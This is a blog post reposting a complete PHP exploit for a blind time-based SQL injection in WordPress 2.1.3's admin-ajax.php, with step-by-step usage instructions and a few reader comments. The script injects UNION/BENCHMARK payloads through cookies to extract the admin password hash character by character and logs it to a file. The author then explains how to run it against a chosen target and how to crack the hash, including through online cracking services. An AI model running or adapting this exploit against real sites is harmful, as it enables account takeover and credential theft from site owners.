Hacking wordpress

haha..weird, right, I use wordpress myself. but I found..the hack… just for the sake of knowledge..but don't try it on my blog. if it works…let me know ..thanks

<?php
error_reporting(E_ALL);
$norm_delay = 0;
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit
// written by Janek Vind "waraxe"
// http://www.waraxe.us/
// 21. may 2007
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$outfile = './hacked.txt';// Log file. Remember to CHMOD 777
$url = 'http://target_loe.xxx/wp-admin/admin-ajax.php';
$testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000
$id = 1;// ID of the target user, default value "1" is admin's ID
$suffix = '';// Override value, if needed
$prefix = 'wp_';// WordPress table prefix, default is "wp_"
//=====================================================================

echo "Target: $url\n";
echo "sql table prefix: $prefix\n";

if(empty($suffix))
{
$suffix = md5(substr($url, 0, strlen($url) - 24));
}

echo "cookie suffix: $suffix\n";

echo "testing probe delays \n";

$norm_delay = get_normdelay($testcnt);
echo "normal delay: $norm_delay deciseconds\n";

$hash = get_hash();

add_line("Target: $url");
add_line("User ID: $id");
add_line("Hash: $hash");

echo "\nWork finished\n";
echo "Questions and feedback - http://www.waraxe.us/ \n";
die("See ya! :) \n");
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_hash()
{
$len = 32;
$field = 'user_password';
$out = '';

echo "finding hash now ...\n";

for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_hashchar($field,$i);
echo "got $field pos $i -> $ch\n";
$out .= "$ch";
echo "current value for $field: $out \n";
}

echo "\nFinal result: $field=$out\n\n";

return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($field,$pos)
{
global $prefix, $suffix, $id, $testcnt;
$char = '';
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt, MD5(1337)),3)/*";

// First let's determine, if it's number or letter
$inj = sprintf($ipattern, $prefix, $id, ">57");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$letter = test_condition($post);

if($letter)
{
$min = 97;
$max = 102;
echo "char to find is [a-f]\n";
}
else
{
$min = 48;
$max = 57;
echo "char to find is [0-9]\n";
}

$curr = 0;

while(1)
{
$area = $max - $min;
if($area < 2 )
{
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);

if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}

break;
}

$half = intval(floor($area / 2));
$curr = $min + $half;

$inj = sprintf($ipattern, $prefix, $id, ">$curr");
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$bigger = test_condition($post);

if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}

echo "curr: $curr-$max-$min\n";
}

return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
global $url, $norm_delay;
$bret = false;
$maxtry = 10;
$try = 1;

while(1)
{
$start = getmicrotime();
$buff = make_post($url, $p);
$end = getmicrotime();

if($buff === '-1')
{
break;
}
else
{
echo "test_condition() - try $try - invalid return value ...\n";
$try ++;
if($try > $maxtry)
{
die("too many tries - exiting ...\n");
}
else
{
echo "trying again - try $try ...\n";
}
}
}

$diff = $end - $start;
$delay = intval($diff * 10);

if($delay > ($norm_delay * 2))
{
$bret = true;
}

return $bret;
}
///////////////////////////////////////////////////////////////////////
function get_normdelay($testcnt)
{
$fa = test_md5delay(1);
echo "$fa\n";
$sa = test_md5delay($testcnt);
echo "$sa\n";
$fb = test_md5delay(1);
echo "$fb\n";
$sb = test_md5delay($testcnt);
echo "$sb\n";
$fc = test_md5delay(1);
echo "$fc\n";
$sc = test_md5delay($testcnt);
echo "$sc\n";

$mean_nondelayed = intval(($fa + $fb + $fc) / 3);
echo "mean nondelayed - $mean_nondelayed dsecs\n";
$mean_delayed = intval(($sa + $sb + $sc) / 3);
echo "mean delayed - $mean_delayed dsecs\n";

return $mean_delayed;
}
///////////////////////////////////////////////////////////////////////
function test_md5delay($cnt)
{
global $url, $id, $prefix, $suffix;

// delay in deciseconds
$delay = -1;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = ' UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH(user_pass)>31,BENCHMARK(%d,MD5(1337)),3)/*';
$inj = sprintf($ipattern, $prefix, $id, $cnt);
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$start = getmicrotime();
$buff = make_post($url, $post);
$end = getmicrotime();

if(intval($buff) !== -1)
{
die("test_md5delay($cnt) - invalid return value, exiting ...");
}

$diff = $end - $start;
$delay = intval($diff * 10);

return $delay;
}
///////////////////////////////////////////////////////////////////////
function getmicrotime()
{
list($usec, $sec) = explode(" ", microtime());
return ((float)$usec + (float)$sec);
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');

if(!empty($cookie))
{
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
}

if(!empty($referer))
{
curl_setopt ($ch, CURLOPT_REFERER, $referer);
}

if($headers === TRUE)
{
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
}
else
{
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
}

$fc = curl_exec($ch);
curl_close($ch);

return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($buf)
{
global $outfile;

$buf .= "\n";
$fh = fopen($outfile, 'ab');
fwrite($fh, $buf);
fclose($fh);

}
///////////////////////////////////////////////////////////////////////
?>

Usage:
1. Change $url to your target.
2. Create one empty file, hacked.txt, with attribute CHMOD 777
3. Run it; if successful you will get output like this:

Target: http://blog.r******x.com/wp-admin/admin-ajax.php
User ID: 1
Md5 Hash: 9d150562e37ffeb3d8e4bf1*********

Last thing to do is crack the hash.

Ref : http://www.milw0rm.com/md5

Hmm..there are 2 ways to use it.
A. Online / Host
1. Host it on a server that supports PHP
2. Then save the code above under a name of your choice, e.g. terserah.php
3. Create one empty .txt file (e.g. hacked.txt)
4. Upload both files
5. Set the file's CHMOD (attribute) to 777 (read, write, edit for all users)
6. Run terserah.php in a web browser
7. If successful, information like the above will appear in hacked.txt.
8. Crack the hash. There are several solutions.
- Crack it yourself using brute-force (takes days)
- Post it to a forum website that offers an md5 cracking service (e.g. http://milw0rm.com/md5 or http://waraxe.us)

B. Run it with PHP.exe
1. Make sure you have an engine that can execute PHP (e.g. apache2triad, or anything else)
2. Save the file above as in step A.2.
3. See A.3.
4. Open a command prompt, then run --> PHP.exe terserah.php
5. Look at the response; if successful: see step A.7.
6. Follow step A.8.


4 thoughts on "Hacking wordpress"

  1. too simple man....

  2. Bro there's an error at

    Parse error: syntax error, unexpected ':' in /home/blabla/public_html/blabla.php on line 13

    How come, even though it matches…

  3. Parse error: syntax error, unexpected ':' in /home/blabla/public_html/blabla.php on line 13

    try checking line 13 first…

  4. wp bug, it's already been fixed now, bro..
